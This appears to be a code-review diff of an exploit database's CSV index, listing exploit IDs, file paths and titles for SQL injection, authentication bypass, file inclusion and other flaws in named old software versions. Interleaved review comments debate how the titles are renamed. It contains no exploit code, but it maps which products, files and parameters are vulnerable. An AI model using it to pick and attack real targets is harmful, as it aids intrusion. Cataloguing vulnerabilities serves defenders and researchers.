20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0
|
||||
20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0
|
||||
20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0
|
||||
20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script (MS00-090)",2000-11-22,"Sandro Gauci",windows,remote,0
|
||||
20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 - sample script Exploit",1997-07-15,"Francisco Torres",cgi,remote,0
|
||||
20425,platforms/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",multiple,remote,0
|
||||
20426,platforms/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 - 'Index.dat' Exploit (MS00-055)",2000-11-23,"Georgi Guninski",windows,remote,0
|
||||
|
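Review bot: The description of new row 20424 ends at "'.wms' Arbitrary Script", which does not say what happens with the script, whereas the neighbouring rows name the effect ("Source Disclosure", "Buffer Overflow", "File Existence Disclosure"). Complete the phrase from the MS00-090 advisory text so the row is searchable by impact. The row is also inserted before 20423 rather than after it, so either swap the two or confirm the order is intended.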
@ -15892,7 +15895,7 @@ id,file,description,date,author,platform,type,port
|
|||
873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users",2005-03-11,Ali7,php,webapps,0
|
||||
881,platforms/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,php,webapps,0
|
||||
889,platforms/php/webapps/889.pl,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps,0
|
||||
892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass (SQL Injection)",2005-03-21,kre0n,php,webapps,0
|
||||
892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass",2005-03-21,kre0n,php,webapps,0
|
||||
897,platforms/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps,0
|
||||
901,platforms/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass",2005-03-29,RusH,php,webapps,0
|
||||
907,platforms/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0
|
||||
|
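Review bot: Shortening row 892 from "Authentication Bypass (SQL Injection)" to "Authentication Bypass" removes the vulnerability class from the description column, and the commit message shows the same rewrite applied to a long run of other titles. After this change the row is indistinguishable by title from 889 and 901 in this hunk, and a search of files.csv for "SQL Injection" no longer returns it. Since the CSV has no separate column for the bug class, keep the suffix in one normalized form, such as "Authentication Bypass (SQL Injection)", instead of dropping it.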
@ -15901,7 +15904,7 @@ id,file,description,date,author,platform,type,port
|
|||
922,platforms/cgi/webapps/922.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,GreenwooD,cgi,webapps,0
|
||||
30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0
|
||||
923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps,0
|
||||
925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Admin Authentication Bypass (SQL Injection)",2005-04-09,LaMeR,asp,webapps,0
|
||||
925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Authentication Bypass",2005-04-09,LaMeR,asp,webapps,0
|
||||
928,platforms/php/webapps/928.py,"PunBB 1.2.4 - 'id' Parameter SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0
|
||||
939,platforms/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0
|
||||
954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - (index.cgi) Remote Command Execution",2005-04-25,z,cgi,webapps,0
|
||||
|
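Review bot: The new title for row 925 removes "Admin" as well as "(SQL Injection)", so "ACNews 1.0 - Authentication Bypass" no longer says which login is bypassed. The privilege level reached is what someone triaging this entry needs first. Suggest keeping it, for example "ACNews 1.0 - Admin Authentication Bypass", and treating the SQL injection suffix the same way as in the other renamed rows.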
@ -16050,7 +16053,7 @@ id,file,description,date,author,platform,type,port
|
|||
1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,php,webapps,0
|
||||
1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection",2006-02-05,SkOd,php,webapps,0
|
||||
1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution",2006-02-06,Hessam-x,cgi,webapps,0
|
||||
1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - (Authentication Bypass) SQL Injection",2006-02-06,Zodiac,asp,webapps,0
|
||||
1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - Authentication Bypass",2006-02-06,Zodiac,asp,webapps,0
|
||||
1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
|
||||
1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
|
||||
1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Arbitrary File Upload",2006-02-09,rgod,php,webapps,0
|
||||
|
@ -16656,7 +16659,7 @@ id,file,description,date,author,platform,type,port
|
|||
2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - (Review.asp) SQL Injection",2006-09-17,ajann,asp,webapps,0
|
||||
2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - (users_logins/admin.txt) Credentials Disclosure",2006-09-17,Kacper,php,webapps,0
|
||||
2389,platforms/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution",2006-09-18,Kw3[R]Ln,php,webapps,0
|
||||
2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - 'phpbb_root_path' Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0
|
||||
2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0
|
||||
2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - (view) Remote Command Execution",2006-09-19,rgod,php,webapps,0
|
||||
2392,platforms/php/webapps/2392.txt,"Pie Cart Pro - (Home_Path) Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps,0
|
||||
2393,platforms/php/webapps/2393.txt,"Pie Cart Pro - (Inc_Dir) Remote File Inclusion",2006-09-19,SnIpEr_SA,php,webapps,0
|
||||
|
@ -17036,7 +17039,7 @@ id,file,description,date,author,platform,type,port
|
|||
2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - (PNSVlang) Remote Code Execution",2006-12-03,Kacper,php,webapps,0
|
||||
2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - (categories.php) Local File Inclusion",2006-12-03,r0ut3r,php,webapps,0
|
||||
2890,platforms/php/webapps/2890.txt,"PHP-revista 1.1.2 - (adodb) Multiple Remote File Inclusion",2006-12-03,"Cold Zero",php,webapps,0
|
||||
2891,platforms/php/webapps/2891.txt,"cutenews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0
|
||||
2891,platforms/php/webapps/2891.txt,"CuteNews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0
|
||||
2894,platforms/php/webapps/2894.txt,"Phorum 3.2.11 - 'common.php' Remote File Inclusion",2006-12-06,Mr-m07,php,webapps,0
|
||||
2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - (link) Remote File Inclusion",2006-12-07,3l3ctric-Cracker,php,webapps,0
|
||||
2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - File Inclusion",2006-12-08,3l3ctric-Cracker,php,webapps,0
|
||||
|
@ -17387,7 +17390,7 @@ id,file,description,date,author,platform,type,port
|
|||
3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - 'ROOT_PATH' Remote File Inclusion",2007-03-13,the_day,php,webapps,0
|
||||
3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0
|
||||
3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps,0
|
||||
3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) SQL Injection",2007-03-14,WiLdBoY,php,webapps,0
|
||||
3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - 'id' Parameter SQL Injection",2007-03-14,WiLdBoY,php,webapps,0
|
||||
3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0
|
||||
3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0
|
||||
3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) SQL Injection",2007-03-15,x666,php,webapps,0
|
||||
|
@ -17729,7 +17732,7 @@ id,file,description,date,author,platform,type,port
|
|||
4020,platforms/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0
|
||||
4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion",2007-06-01,GoLd_M,php,webapps,0
|
||||
4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution",2007-06-02,Kacper,php,webapps,0
|
||||
4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - (index.php c) SQL Injection",2007-06-03,Kacper,php,webapps,0
|
||||
4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - 'index.php' SQL Injection",2007-06-03,Kacper,php,webapps,0
|
||||
4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution",2007-06-04,Silentz,php,webapps,0
|
||||
4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - 'listmembers.php' SQL Injection",2007-06-04,Silentz,php,webapps,0
|
||||
4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 - (addressbook.php) Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps,0
|
||||
|
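Review bot: the new title for 4026 keeps the script name but drops the vulnerable parameter. The old text "(index.php c)" named parameter c, and "'index.php' SQL Injection" no longer does. Other renames in this commit go the other way: 3477 becomes "'id' Parameter SQL Injection" and 4796 becomes "'PHPEx' Parameter Local File Inclusion". Suggest "'c' Parameter SQL Injection", or a form that keeps both the file and the parameter, so the row stays findable by parameter name.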
@ -17806,7 +17809,7 @@ id,file,description,date,author,platform,type,port
|
|||
4142,platforms/php/webapps/4142.txt,"Girlserv ads 1.5 - (details_news.php) SQL Injection",2007-07-03,"Cold Zero",php,webapps,0
|
||||
4144,platforms/php/webapps/4144.php,"MyCMS 0.9.8 - Remote Command Execution (2)",2007-07-03,BlackHawk,php,webapps,0
|
||||
4145,platforms/php/webapps/4145.php,"MyCMS 0.9.8 - Remote Command Execution (1)",2007-07-03,BlackHawk,php,webapps,0
|
||||
4147,platforms/php/webapps/4147.php,"PNPHPBB2 <= 1.2i - viewforum.php SQL Injection",2007-07-03,Coloss,php,webapps,0
|
||||
4147,platforms/php/webapps/4147.php,"PNPHPBB2 <= 1.2i - 'viewforum.php' SQL Injection",2007-07-03,Coloss,php,webapps,0
|
||||
4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 - 'admin.php' Remote Security Bypass",2007-07-05,R4M!,php,webapps,0
|
||||
4151,platforms/php/webapps/4151.sh,"AsteriDex 3.0 - (callboth.php) Remote Code Execution",2007-07-05,"Carl Livitt",php,webapps,0
|
||||
4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - 'categories_type.php' SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0
|
||||
|
@ -18213,7 +18216,7 @@ id,file,description,date,author,platform,type,port
|
|||
4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A - (all modules) SQL Injection",2007-12-26,JosS,php,webapps,0
|
||||
4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0
|
||||
4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0
|
||||
4796,platforms/php/webapps/4796.txt,"PNPHPBB2 <= 1.2i - (printview.php PHPEx) Local File Inclusion",2007-12-26,irk4z,php,webapps,0
|
||||
4796,platforms/php/webapps/4796.txt,"PNPHPBB2 <= 1.2i - 'PHPEx' Parameter Local File Inclusion",2007-12-26,irk4z,php,webapps,0
|
||||
4798,platforms/php/webapps/4798.php,"ZeusCMS 0.3 - Blind SQL Injection",2007-12-27,EgiX,php,webapps,0
|
||||
4799,platforms/php/webapps/4799.txt,"Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0
|
||||
4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 - showcode.php Remote Command Execution",2007-12-28,MhZ91,php,webapps,0
|
||||
|
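Review bot: the product name in the 4796 row is still spelled "PNPHPBB2" (as in 4026 and 4147), while the 2390 and 7658 rows in this same commit use "PNphpBB2". The commit already normalizes casing elsewhere (cutenews to CuteNews, phpauctionsystem to PHPAuctionSystem), so pick one spelling for all five rows so that they group under a single product name.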
@ -20378,7 +20381,7 @@ id,file,description,date,author,platform,type,port
|
|||
7599,platforms/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure",2008-12-28,Cyber.Zer0,asp,webapps,0
|
||||
7600,platforms/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload",2008-12-28,Osirys,php,webapps,0
|
||||
7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0
|
||||
7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Authentication Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0
|
||||
7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - Authentication Bypass",2008-12-29,AnGeL25dZ,php,webapps,0
|
||||
7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
|
||||
7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
|
||||
7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password",2008-12-29,cOndemned,php,webapps,0
|
||||
|
@ -20416,29 +20419,29 @@ id,file,description,date,author,platform,type,port
|
|||
7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-01-02,ahmadbady,php,webapps,0
|
||||
7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection",2009-01-03,darkjoker,php,webapps,0
|
||||
7653,platforms/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,php,webapps,0
|
||||
7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0
|
||||
7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0
|
||||
7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0
|
||||
7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Parameter Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0
|
||||
7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 1.2i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0
|
||||
7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' Parameter SQL Injection",2009-01-04,DaiMon,php,webapps,0
|
||||
7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - (index.php id) SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0
|
||||
7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,php,webapps,0
|
||||
7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0
|
||||
7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0
|
||||
7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - (Authentication Bypass) SQL Injection",2009-01-05,ByALBAYX,asp,webapps,0
|
||||
7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - Authentication Bypass",2009-01-05,ByALBAYX,asp,webapps,0
|
||||
7667,platforms/php/webapps/7667.txt,"Joomla! Component simple_review 1.x - SQL Injection",2009-01-05,EcHoLL,php,webapps,0
|
||||
7668,platforms/php/webapps/7668.pl,"Cybershade CMS 0.2b - 'index.php' Remote File Inclusion",2009-01-05,JosS,php,webapps,0
|
||||
7669,platforms/php/webapps/7669.pl,"Joomla! Component com_na_newsdescription - (newsid) SQL Injection",2009-01-05,EcHoLL,php,webapps,0
|
||||
7670,platforms/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' SQL Injection",2009-01-05,EcHoLL,php,webapps,0
|
||||
7672,platforms/php/webapps/7672.txt,"phpauctionsystem - Cross-Site Scripting / SQL Injection",2009-01-05,x0r,php,webapps,0
|
||||
7670,platforms/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' Parameter SQL Injection",2009-01-05,EcHoLL,php,webapps,0
|
||||
7672,platforms/php/webapps/7672.txt,"PHPAuctionSystem - Cross-Site Scripting / SQL Injection",2009-01-05,x0r,php,webapps,0
|
||||
7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0
|
||||
7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem - Multiple Remote File Inclusion",2009-01-06,darkmasking,php,webapps,0
|
||||
7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - (forumid) Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0
|
||||
7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - 'forumid' Parameter Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0
|
||||
7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - Cross-Site Scripting / SQL Injection",2009-01-06,!-BUGJACK-!,php,webapps,0
|
||||
7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - (Authentication Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0
|
||||
7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - Authentication Bypass",2009-01-06,ZoRLu,php,webapps,0
|
||||
7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0
|
||||
7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - Authentication Bypass",2009-01-06,certaindeath,php,webapps,0
|
||||
7687,platforms/php/webapps/7687.txt,"playSms 0.9.3 - Multiple Remote / Local File Inclusion",2009-01-06,ahmadbady,php,webapps,0
|
||||
7689,platforms/php/webapps/7689.txt,"BlogHelper - 'common_db.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
|
||||
7690,platforms/php/webapps/7690.txt,"PollHelper - 'poll.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
|
||||
7687,platforms/php/webapps/7687.txt,"PlaySms 0.9.3 - Multiple Remote / Local File Inclusion",2009-01-06,ahmadbady,php,webapps,0
|
||||
7689,platforms/php/webapps/7689.txt,"BlogHelper - Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
|
||||
7690,platforms/php/webapps/7690.txt,"PollHelper - Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
|
||||
7691,platforms/php/webapps/7691.php,"Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal",2009-01-07,irk4z,php,webapps,0
|
||||
7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
|
||||
7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
|
||||
|
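Review bot: in the 7689 and 7690 rows the rename removes the name of the disclosed file ('common_db.inc' and 'poll.inc'), leaving only "Remote Config File Disclosure". The file name is the detail a reader needs in order to check whether an install exposes it, and other titles in this hunk keep theirs (7665 "'acc.mdb' Database Disclosure"). Suggest leaving the quoted file name in both titles, as in "BlogHelper - 'common_db.inc' Remote Config File Disclosure".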
@ -20447,17 +20450,17 @@ id,file,description,date,author,platform,type,port
|
|||
7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0
|
||||
7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - (visualizza.php idvar) Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0
|
||||
7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution",2009-01-08,StAkeR,php,webapps,0
|
||||
7711,platforms/php/webapps/7711.txt,"Fast FAQs System - (Authentication Bypass) SQL Injection",2009-01-09,x0r,php,webapps,0
|
||||
7711,platforms/php/webapps/7711.txt,"Fast FAQs System - Authentication Bypass",2009-01-09,x0r,php,webapps,0
|
||||
7716,platforms/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
|
||||
7717,platforms/php/webapps/7717.pl,"Joomla! Component com_jashowcase - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
|
||||
7718,platforms/php/webapps/7718.txt,"Joomla! Component com_newsflash - 'id' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
|
||||
7719,platforms/php/webapps/7719.txt,"Fast Guest Book - (Authentication Bypass) SQL Injection",2009-01-11,Moudi,php,webapps,0
|
||||
7719,platforms/php/webapps/7719.txt,"Fast Guest Book - Authentication Bypass",2009-01-11,Moudi,php,webapps,0
|
||||
7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - (products.php pcat) SQL Injection",2009-01-11,"Glafkos Charalambous",php,webapps,0
|
||||
7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0
|
||||
7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - (id_animateur) Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0
|
||||
7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection",2009-01-11,stylextra,php,webapps,0
|
||||
7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - (Authentication Bypass) SQL Injection",2009-01-11,SirGod,php,webapps,0
|
||||
7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - (Authentication Bypass) SQL Injection",2009-01-11,x0r,php,webapps,0
|
||||
7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - Authentication Bypass",2009-01-11,SirGod,php,webapps,0
|
||||
7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - Authentication Bypass",2009-01-11,x0r,php,webapps,0
|
||||
7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax - 'comment_id' Parameter SQL Injection",2009-01-11,FasTWORM,php,webapps,0
|
||||
7730,platforms/php/webapps/7730.txt,"Social Engine - 'browse_classifieds.php s' SQL Injection",2009-01-11,snakespc,php,webapps,0
|
||||
7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0
|
||||
|
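Review bot: the unchanged rows 7716, 7717 and 7718 still read "'catid' SQL Injection" and "'id' SQL Injection" without the word "Parameter", while 7729 a few rows below reads "'comment_id' Parameter SQL Injection" and the previous hunk adds "Parameter" to 7659 and 7670. If "'<name>' Parameter" is the target format, these three rows and 7703 "(comment_id)" should be brought in line in the same pass rather than left half-converted.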
@ -20475,8 +20478,8 @@ id,file,description,date,author,platform,type,port
|
|||
7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0
|
||||
7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - (cilla.cgi) Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
|
||||
7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0
|
||||
7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - (Authentication Bypass) SQL Injection",2009-01-13,darkjoker,php,webapps,0
|
||||
7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - (Authentication Bypass) SQL Injection",2009-01-14,darkjoker,php,webapps,0
|
||||
7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - Authentication Bypass",2009-01-13,darkjoker,php,webapps,0
|
||||
7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - Authentication Bypass",2009-01-14,darkjoker,php,webapps,0
|
||||
7761,platforms/asp/webapps/7761.txt,"Netvolution CMS 1.0 - Cross-Site Scripting / SQL Injection",2009-01-14,Ellinas,asp,webapps,0
|
||||
7764,platforms/php/webapps/7764.txt,"DMXReady Blog Manager 1.1 - Remote File Delete",2009-01-14,ajann,php,webapps,0
|
||||
7766,platforms/asp/webapps/7766.txt,"DMXReady Catalog Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0
|
||||
|
@ -20506,13 +20509,13 @@ id,file,description,date,author,platform,type,port
|
|||
7796,platforms/php/webapps/7796.txt,"mkportal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0
|
||||
7797,platforms/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - (clanek) Blind SQL Injection",2009-01-15,darkjoker,php,webapps,0
|
||||
7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script - 'readbible.php' SQL Injection",2009-01-15,nuclear,php,webapps,0
|
||||
7800,platforms/asp/webapps/7800.txt,"eFAQ - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7801,platforms/asp/webapps/7801.txt,"eReservations - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7802,platforms/asp/webapps/7802.txt,"The Walking Club - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7803,platforms/asp/webapps/7803.txt,"Ping IP - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7800,platforms/asp/webapps/7800.txt,"eFAQ - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7801,platforms/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7802,platforms/asp/webapps/7802.txt,"The Walking Club - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7803,platforms/asp/webapps/7803.txt,"Ping IP - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
|
||||
7805,platforms/php/webapps/7805.txt,"Rankem - File Disclosure / Cross-Site Scripting / Cookie",2009-01-16,Pouya_Server,php,webapps,0
|
||||
7806,platforms/php/webapps/7806.txt,"blogit! - SQL Injection / File Disclosure / Cross-Site Scripting",2009-01-16,Pouya_Server,php,webapps,0
|
||||
7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - (Authentication Bypass) SQL Injection",2009-01-16,SuB-ZeRo,asp,webapps,0
|
||||
7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - Authentication Bypass",2009-01-16,SuB-ZeRo,asp,webapps,0
|
||||
7809,platforms/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
|
||||
7810,platforms/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
|
||||
7811,platforms/php/webapps/7811.txt,"Aj Classifieds For Sale 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
|
||||
|
